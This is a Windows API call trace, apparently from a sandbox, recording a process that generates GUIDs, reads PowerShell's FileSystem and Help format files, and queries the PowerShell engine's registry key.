	[0473.732] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x92467022, Data2=0xebcd, Data3=0x44c3, Data4=([0]=0xb0, [1]=0xea, [2]=0x8c, [3]=0x6d, [4]=0xca, [5]=0x9d, [6]=0xea, [7]=0x1e))) returned 0x0
	[0473.732] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x98439081, Data2=0x5502, Data3=0x4046, Data4=([0]=0xbb, [1]=0xc5, [2]=0xf0, [3]=0xf4, [4]=0xb6, [5]=0xe3, [6]=0x8b, [7]=0xa0))) returned 0x0
	[0473.732] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x67928920, Data2=0x43db, Data3=0x43c6, Data4=([0]=0x8a, [1]=0xdc, [2]=0xf5, [3]=0xb6, [4]=0x17, [5]=0xc4, [6]=0x27, [7]=0xe7))) returned 0x0
	[0473.732] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x263980dd, Data2=0xe88d, Data3=0x44a8, Data4=([0]=0x91, [1]=0x1d, [2]=0xd9, [3]=0xfa, [4]=0xaf, [5]=0xad, [6]=0xd6, [7]=0x96))) returned 0x0
	[0473.732] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x3dc43da4, Data2=0x83f6, Data3=0x40af, Data4=([0]=0x95, [1]=0x52, [2]=0x95, [3]=0xcc, [4]=0x77, [5]=0xbf, [6]=0x31, [7]=0x99))) returned 0x0
	[0473.733] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xf1e382ce, Data2=0x13a4, Data3=0x4090, Data4=([0]=0xb1, [1]=0xd9, [2]=0x7f, [3]=0xca, [4]=0xc5, [5]=0xc6, [6]=0x42, [7]=0x9d))) returned 0x0
	[0473.734] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xcfb55741, Data2=0xb799, Data3=0x4f59, Data4=([0]=0x82, [1]=0xf8, [2]=0x4b, [3]=0xe1, [4]=0x24, [5]=0x17, [6]=0x38, [7]=0xe1))) returned 0x0
	[0473.734] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0473.734] GetFileType (hFile=0x338) returned 0x1
	[0473.734] SetErrorMode (uMode=0x1) returned 0x1
	[0473.734] GetFileType (hFile=0x338) returned 0x1
	[0473.734] ReadFile (in: hFile=0x338, lpBuffer=0x35f4b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x35f4b00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.735] ReadFile (in: hFile=0x338, lpBuffer=0x35f4b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x35f4b00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.736] ReadFile (in: hFile=0x338, lpBuffer=0x35f4b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x35f4b00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.736] ReadFile (in: hFile=0x338, lpBuffer=0x35f4b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x35f4b00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.737] ReadFile (in: hFile=0x338, lpBuffer=0x35f4b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x35f4b00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.737] ReadFile (in: hFile=0x338, lpBuffer=0x35f4b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x35f4b00*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.737] ReadFile (in: hFile=0x338, lpBuffer=0x35f4b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x35f4b00*, lpNumberOfBytesRead=0x16d078*=0x119, lpOverlapped=0x0) returned 1
	[0473.737] ReadFile (in: hFile=0x338, lpBuffer=0x35f4b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x35f4b00*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0473.737] CloseHandle (hObject=0x338) returned 1
	[0473.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0473.738] SetErrorMode (uMode=0x1) returned 0x1
	[0473.738] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0473.738] SetErrorMode (uMode=0x1) returned 0x1
	[0473.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0473.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x338) returned 0x0
	[0473.738] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0473.738] CoTaskMemAlloc (cb=0x5a) returned 0x272150
	[0473.738] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x272150, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0473.738] CoTaskMemFree (pv=0x272150) 
	[0473.738] RegCloseKey (hKey=0x338) returned 0x0
	[0473.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0473.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0473.741] VirtualQuery (in: lpAddress=0x16bba0, lpBuffer=0x16ca60, dwLength=0x30 | out: lpBuffer=0x16ca60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0473.742] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x5c3de153, Data2=0xdc56, Data3=0x4cd4, Data4=([0]=0xac, [1]=0x95, [2]=0x99, [3]=0xbb, [4]=0xea, [5]=0x61, [6]=0x26, [7]=0x8b))) returned 0x0
	[0473.742] VirtualQuery (in: lpAddress=0x16bce0, lpBuffer=0x16cba0, dwLength=0x30 | out: lpBuffer=0x16cba0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0474.697] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xfc301dc4, Data2=0xae37, Data3=0x4847, Data4=([0]=0xb0, [1]=0x5, [2]=0xb5, [3]=0xb2, [4]=0x36, [5]=0x53, [6]=0xd6, [7]=0x47))) returned 0x0
	[0474.698] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xfda97064, Data2=0x9085, Data3=0x4929, Data4=([0]=0x8c, [1]=0xa4, [2]=0xec, [3]=0xf, [4]=0x7, [5]=0x1e, [6]=0x39, [7]=0x6d))) returned 0x0
	[0474.698] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x8f564c63, Data2=0x6aee, Data3=0x4640, Data4=([0]=0xba, [1]=0x5c, [2]=0x43, [3]=0x44, [4]=0x1c, [5]=0xae, [6]=0x51, [7]=0x5a))) returned 0x0
	[0474.699] VirtualQuery (in: lpAddress=0x16bce0, lpBuffer=0x16cba0, dwLength=0x30 | out: lpBuffer=0x16cba0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0474.699] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0474.700] GetFileType (hFile=0x338) returned 0x1
	[0474.700] SetErrorMode (uMode=0x1) returned 0x1
	[0474.700] GetFileType (hFile=0x338) returned 0x1
	[0474.700] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.701] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.701] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.701] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.702] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.702] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.702] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.703] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.703] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.704] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.704] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.704] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.704] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.704] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.705] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.705] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.706] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.706] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.706] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.707] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.707] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.707] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.707] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.707] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.708] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.708] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.708] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.708] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.708] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.709] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.709] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.709] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.711] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.711] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.712] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.712] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.712] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.712] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.713] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.713] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.713] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.714] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.714] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.714] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.714] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.714] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.715] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.715] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.715] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.715] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.716] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.716] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.716] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.716] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.716] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.717] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.717] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.717] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.717] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.717] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.718] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.718] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0474.718] ReadFile (in: hFile=0x338, lpBuffer=0x3650ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3650ca0*, lpNumberOfBytesRead=0x16d078*=0xf37, lpOverlapped=0x0) returned 1
